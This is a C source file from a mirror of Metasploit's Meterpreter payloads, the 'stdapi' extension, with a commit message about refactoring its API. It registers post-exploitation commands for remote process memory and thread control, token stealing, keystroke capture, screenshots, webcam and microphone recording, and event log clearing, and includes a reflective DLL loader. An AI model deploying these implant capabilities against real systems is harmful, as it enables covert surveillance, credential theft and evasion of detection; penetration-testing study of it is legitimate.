mirror of
https://github.com/rapid7/metasploit-payloads
synced 2025-05-12 19:04:32 +02:00
4ffe127f04
The 'common' library has been removed. The only project that actually used it was metsrv, so the code that metsrv required from common is now directly compiled in as part of that project. The common folder now contains files that are importanta cross all of the projects, with a primary focus on the new "API" style function. What this means is that MetSrv has an API that it exposes through a function pointer that is passed to the extension when it's initialised. This pointer references a structure with all the API functions wired in. This means that: * Extensions don't need to know anything about metsrv at compile time. * The delay loading code can be removed, which was one of the last instances of "metsrv.dll" as a string. * Metsrv.dll no longer exports any functions. More to come.
211 lines
10 KiB
C
211 lines
10 KiB
C
/*
|
|
* This module provides access to the standard API of the machine in some
|
|
* regards
|
|
*/
|
|
#include "precomp.h"
|
|
#include "common_metapi.h"
|
|
|
|
// Required so that use of the API works.
|
|
MetApi* met_api = NULL;
|
|
|
|
// include the Reflectiveloader() function, we end up linking back to the metsrv.dll's Init function
|
|
// but this doesnt matter as we wont ever call DLL_METASPLOIT_ATTACH as that is only used by the
|
|
// second stage reflective dll inject payload and not the metsrv itself when it loads extensions.
|
|
#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
|
|
|
|
// NOTE: _CRT_SECURE_NO_WARNINGS has been added to Configuration->C/C++->Preprocessor->Preprocessor
|
|
|
|
// General
|
|
extern DWORD request_general_channel_open(Remote *remote, Packet *packet);
|
|
|
|
Command customCommands[] =
|
|
{
|
|
// General
|
|
COMMAND_REQ("core_channel_open", request_general_channel_open),
|
|
|
|
// Railgun
|
|
COMMAND_REQ("stdapi_railgun_api", request_railgun_api),
|
|
COMMAND_REQ("stdapi_railgun_api_multi", request_railgun_api_multi),
|
|
COMMAND_REQ("stdapi_railgun_memread", request_railgun_memread),
|
|
COMMAND_REQ("stdapi_railgun_memwrite", request_railgun_memwrite),
|
|
|
|
// Fs
|
|
COMMAND_REQ("stdapi_fs_ls", request_fs_ls),
|
|
COMMAND_REQ("stdapi_fs_getwd", request_fs_getwd),
|
|
COMMAND_REQ("stdapi_fs_chdir", request_fs_chdir),
|
|
COMMAND_REQ("stdapi_fs_mkdir", request_fs_mkdir),
|
|
COMMAND_REQ("stdapi_fs_delete_dir", request_fs_delete_dir),
|
|
COMMAND_REQ("stdapi_fs_delete_file", request_fs_delete_file),
|
|
COMMAND_REQ("stdapi_fs_separator", request_fs_separator),
|
|
COMMAND_REQ("stdapi_fs_stat", request_fs_stat),
|
|
COMMAND_REQ("stdapi_fs_file_expand_path", request_fs_file_expand_path),
|
|
COMMAND_REQ("stdapi_fs_file_move", request_fs_file_move),
|
|
COMMAND_REQ("stdapi_fs_file_copy", request_fs_file_copy),
|
|
COMMAND_REQ("stdapi_fs_md5", request_fs_md5),
|
|
COMMAND_REQ("stdapi_fs_sha1", request_fs_sha1),
|
|
COMMAND_REQ("stdapi_fs_search", request_fs_search),
|
|
COMMAND_REQ("stdapi_fs_mount_show", request_fs_mount_show),
|
|
|
|
// Process
|
|
COMMAND_REQ("stdapi_sys_process_attach", request_sys_process_attach),
|
|
COMMAND_REQ("stdapi_sys_process_close", request_sys_process_close),
|
|
COMMAND_REQ("stdapi_sys_process_execute", request_sys_process_execute),
|
|
COMMAND_REQ("stdapi_sys_process_kill", request_sys_process_kill),
|
|
COMMAND_REQ("stdapi_sys_process_get_processes", request_sys_process_get_processes),
|
|
COMMAND_REQ("stdapi_sys_process_getpid", request_sys_process_getpid),
|
|
COMMAND_REQ("stdapi_sys_process_get_info", request_sys_process_get_info),
|
|
COMMAND_REQ("stdapi_sys_process_wait", request_sys_process_wait),
|
|
|
|
// Image
|
|
COMMAND_REQ("stdapi_sys_process_image_load", request_sys_process_image_load),
|
|
COMMAND_REQ("stdapi_sys_process_image_get_proc_address", request_sys_process_image_get_proc_address),
|
|
COMMAND_REQ("stdapi_sys_process_image_unload", request_sys_process_image_unload),
|
|
COMMAND_REQ("stdapi_sys_process_image_get_images", request_sys_process_image_get_images),
|
|
|
|
// Memory
|
|
COMMAND_REQ("stdapi_sys_process_memory_allocate", request_sys_process_memory_allocate),
|
|
COMMAND_REQ("stdapi_sys_process_memory_free", request_sys_process_memory_free),
|
|
COMMAND_REQ("stdapi_sys_process_memory_read", request_sys_process_memory_read),
|
|
COMMAND_REQ("stdapi_sys_process_memory_write", request_sys_process_memory_write),
|
|
COMMAND_REQ("stdapi_sys_process_memory_query", request_sys_process_memory_query),
|
|
COMMAND_REQ("stdapi_sys_process_memory_protect", request_sys_process_memory_protect),
|
|
COMMAND_REQ("stdapi_sys_process_memory_lock", request_sys_process_memory_lock),
|
|
COMMAND_REQ("stdapi_sys_process_memory_unlock", request_sys_process_memory_unlock),
|
|
|
|
// Thread
|
|
COMMAND_REQ("stdapi_sys_process_thread_open", request_sys_process_thread_open),
|
|
COMMAND_REQ("stdapi_sys_process_thread_create", request_sys_process_thread_create),
|
|
COMMAND_REQ("stdapi_sys_process_thread_close", request_sys_process_thread_close),
|
|
COMMAND_REQ("stdapi_sys_process_thread_get_threads", request_sys_process_thread_get_threads),
|
|
COMMAND_REQ("stdapi_sys_process_thread_suspend", request_sys_process_thread_suspend),
|
|
COMMAND_REQ("stdapi_sys_process_thread_resume", request_sys_process_thread_resume),
|
|
COMMAND_REQ("stdapi_sys_process_thread_terminate", request_sys_process_thread_terminate),
|
|
COMMAND_REQ("stdapi_sys_process_thread_query_regs", request_sys_process_thread_query_regs),
|
|
COMMAND_REQ("stdapi_sys_process_thread_set_regs", request_sys_process_thread_set_regs),
|
|
|
|
// Registry
|
|
COMMAND_REQ("stdapi_registry_check_key_exists", request_registry_check_key_exists),
|
|
COMMAND_REQ("stdapi_registry_load_key", request_registry_load_key),
|
|
COMMAND_REQ("stdapi_registry_unload_key", request_registry_unload_key),
|
|
COMMAND_REQ("stdapi_registry_open_key", request_registry_open_key),
|
|
COMMAND_REQ("stdapi_registry_open_remote_key", request_registry_open_remote_key),
|
|
COMMAND_REQ("stdapi_registry_create_key", request_registry_create_key),
|
|
COMMAND_REQ("stdapi_registry_enum_key", request_registry_enum_key),
|
|
COMMAND_REQ("stdapi_registry_delete_key", request_registry_delete_key),
|
|
COMMAND_REQ("stdapi_registry_close_key", request_registry_close_key),
|
|
COMMAND_REQ("stdapi_registry_set_value", request_registry_set_value),
|
|
COMMAND_REQ("stdapi_registry_query_value", request_registry_query_value),
|
|
COMMAND_REQ("stdapi_registry_query_class", request_registry_query_class),
|
|
COMMAND_REQ("stdapi_registry_enum_value", request_registry_enum_value),
|
|
COMMAND_REQ("stdapi_registry_delete_value", request_registry_delete_value),
|
|
COMMAND_REQ("stdapi_registry_enum_key_direct", request_registry_enum_key_direct),
|
|
COMMAND_REQ("stdapi_registry_enum_value_direct", request_registry_enum_value_direct),
|
|
COMMAND_REQ("stdapi_registry_query_value_direct", request_registry_query_value_direct),
|
|
COMMAND_REQ("stdapi_registry_set_value_direct", request_registry_set_value_direct),
|
|
|
|
// Sys/config
|
|
COMMAND_REQ("stdapi_sys_config_getuid", request_sys_config_getuid),
|
|
COMMAND_REQ("stdapi_sys_config_localtime", request_sys_config_localtime),
|
|
COMMAND_REQ("stdapi_sys_config_sysinfo", request_sys_config_sysinfo),
|
|
COMMAND_REQ("stdapi_sys_config_rev2self", request_sys_config_rev2self),
|
|
COMMAND_REQ("stdapi_sys_config_getprivs", request_sys_config_getprivs),
|
|
COMMAND_REQ("stdapi_sys_config_getenv", request_sys_config_getenv),
|
|
COMMAND_REQ("stdapi_sys_config_driver_list", request_sys_config_driver_list),
|
|
COMMAND_REQ("stdapi_sys_config_steal_token", request_sys_config_steal_token),
|
|
COMMAND_REQ("stdapi_sys_config_drop_token", request_sys_config_drop_token),
|
|
COMMAND_REQ("stdapi_sys_config_getsid", request_sys_config_getsid),
|
|
|
|
// Net
|
|
COMMAND_REQ("stdapi_net_config_get_routes", request_net_config_get_routes),
|
|
COMMAND_REQ("stdapi_net_config_add_route", request_net_config_add_route),
|
|
COMMAND_REQ("stdapi_net_config_remove_route", request_net_config_remove_route),
|
|
COMMAND_REQ("stdapi_net_config_get_interfaces", request_net_config_get_interfaces),
|
|
COMMAND_REQ("stdapi_net_config_get_arp_table", request_net_config_get_arp_table),
|
|
COMMAND_REQ("stdapi_net_config_get_netstat", request_net_config_get_netstat),
|
|
|
|
// Proxy
|
|
COMMAND_REQ("stdapi_net_config_get_proxy", request_net_config_get_proxy_config),
|
|
// Resolve
|
|
COMMAND_REQ("stdapi_net_resolve_host", request_resolve_host),
|
|
COMMAND_REQ("stdapi_net_resolve_hosts", request_resolve_hosts),
|
|
|
|
// Socket
|
|
COMMAND_REQ("stdapi_net_socket_tcp_shutdown", request_net_socket_tcp_shutdown),
|
|
|
|
// UI
|
|
COMMAND_REQ("stdapi_ui_enable_mouse", request_ui_enable_mouse),
|
|
COMMAND_REQ("stdapi_ui_enable_keyboard", request_ui_enable_keyboard),
|
|
COMMAND_REQ("stdapi_ui_get_idle_time", request_ui_get_idle_time),
|
|
COMMAND_REQ("stdapi_ui_start_keyscan", request_ui_start_keyscan),
|
|
COMMAND_REQ("stdapi_ui_stop_keyscan", request_ui_stop_keyscan),
|
|
COMMAND_REQ("stdapi_ui_get_keys", request_ui_get_keys),
|
|
COMMAND_REQ("stdapi_ui_get_keys_utf8", request_ui_get_keys_utf8),
|
|
COMMAND_REQ("stdapi_ui_desktop_enum", request_ui_desktop_enum),
|
|
COMMAND_REQ("stdapi_ui_desktop_get", request_ui_desktop_get),
|
|
COMMAND_REQ("stdapi_ui_desktop_set", request_ui_desktop_set),
|
|
COMMAND_REQ("stdapi_ui_desktop_screenshot", request_ui_desktop_screenshot),
|
|
COMMAND_REQ("stdapi_ui_send_keys", request_ui_send_keys),
|
|
COMMAND_REQ("stdapi_ui_send_keyevent", request_ui_send_keyevent),
|
|
COMMAND_REQ("stdapi_ui_send_mouse", request_ui_send_mouse),
|
|
|
|
// Event Log
|
|
COMMAND_REQ("stdapi_sys_eventlog_open", request_sys_eventlog_open),
|
|
COMMAND_REQ("stdapi_sys_eventlog_numrecords", request_sys_eventlog_numrecords),
|
|
COMMAND_REQ("stdapi_sys_eventlog_read", request_sys_eventlog_read),
|
|
COMMAND_REQ("stdapi_sys_eventlog_oldest", request_sys_eventlog_oldest),
|
|
COMMAND_REQ("stdapi_sys_eventlog_clear", request_sys_eventlog_clear),
|
|
COMMAND_REQ("stdapi_sys_eventlog_close", request_sys_eventlog_close),
|
|
|
|
// Power
|
|
COMMAND_REQ("stdapi_sys_power_exitwindows", request_sys_power_exitwindows),
|
|
|
|
// Webcam
|
|
COMMAND_REQ("webcam_list", request_webcam_list),
|
|
COMMAND_REQ("webcam_start", request_webcam_start),
|
|
COMMAND_REQ("webcam_get_frame", request_webcam_get_frame),
|
|
COMMAND_REQ("webcam_stop", request_webcam_stop),
|
|
|
|
// Audio
|
|
COMMAND_REQ("webcam_audio_record", request_ui_record_mic),
|
|
|
|
COMMAND_TERMINATOR
|
|
};
|
|
|
|
/*!
|
|
* @brief Initialize the server extension.
|
|
* @param remote Pointer to the remote instance.
|
|
* @return Indication of success or failure.
|
|
*/
|
|
DWORD __declspec(dllexport) InitServerExtension(MetApi* api, Remote *remote)
|
|
{
|
|
met_api = api;
|
|
|
|
met_api->command.register_all(customCommands);
|
|
|
|
return ERROR_SUCCESS;
|
|
}
|
|
|
|
/*!
|
|
* @brief Deinitialize the server extension.
|
|
* @param remote Pointer to the remote instance.
|
|
* @return Indication of success or failure.
|
|
*/
|
|
DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote)
|
|
{
|
|
met_api->command.deregister_all(customCommands);
|
|
|
|
return ERROR_SUCCESS;
|
|
}
|
|
|
|
/*!
|
|
* @brief Get the name of the extension.
|
|
* @param buffer Pointer to the buffer to write the name to.
|
|
* @param bufferSize Size of the \c buffer parameter.
|
|
* @return Indication of success or failure.
|
|
*/
|
|
DWORD __declspec(dllexport) GetExtensionName(char* buffer, int bufferSize)
|
|
{
|
|
strncpy_s(buffer, bufferSize, "stdapi", bufferSize - 1);
|
|
return ERROR_SUCCESS;
|
|
}
|